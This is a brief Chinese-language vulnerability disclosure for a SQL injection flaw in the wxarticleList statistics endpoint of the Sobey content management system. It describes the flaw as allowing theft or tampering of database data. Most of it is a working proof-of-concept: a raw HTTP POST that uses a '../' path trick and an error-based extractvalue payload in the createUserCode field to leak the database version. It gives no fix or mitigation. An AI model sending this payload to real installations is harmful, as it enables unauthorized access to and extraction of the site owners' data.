漏洞描述
索贝内容管理系统是一款广泛应用于内容管理领域的软件,提供高效的内容存储、管理和分发功能。该系统的 /sobey-mchEditor/mch/statistics/wxarticleList 接口存在SQL注入漏洞,攻击者可以通过发送特制的请求,利用该漏洞获取数据库中的敏感信息,可能导致数据泄露、篡改或系统控制等严重后果。
索贝内容管理系统 /sobey-mchEditor/mch/statistics/wxarticleList SQL 注入漏洞
PoC代码
POST /sobey-mchEditor/mch/statistics/js/../wxarticleList HTTP/1.1
createUserCode=1'+and+extractvalue(1,concat(0x7e,@version))+and '1'='1&token=1&siteCode=1